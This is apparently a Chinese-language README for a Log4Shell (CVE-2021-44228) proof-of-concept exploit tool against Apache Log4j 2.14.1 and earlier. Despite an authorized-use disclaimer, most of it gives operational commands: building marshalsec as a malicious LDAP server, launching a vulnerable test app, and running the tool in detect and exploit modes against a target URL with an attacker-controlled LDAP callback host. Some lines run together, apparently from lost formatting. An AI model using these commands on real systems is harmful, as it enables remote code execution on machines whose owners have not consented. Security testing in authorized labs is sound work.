(CVE-2021-44228)
针对 Apache Log4j ≤ 2.14.1 中关键漏洞 Log4Shell 的测试利用工具,可通过 JNDI 注入实现远程代码执行。
⚠️ 此 PoC 仅用于教育目的和在授权环境中的受控测试。 未经明确许可,请勿将其用于任何系统。
marshalsec(用于恶意 LDAP 服务器)python3 -m http.server)运行存在漏洞的应用:
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit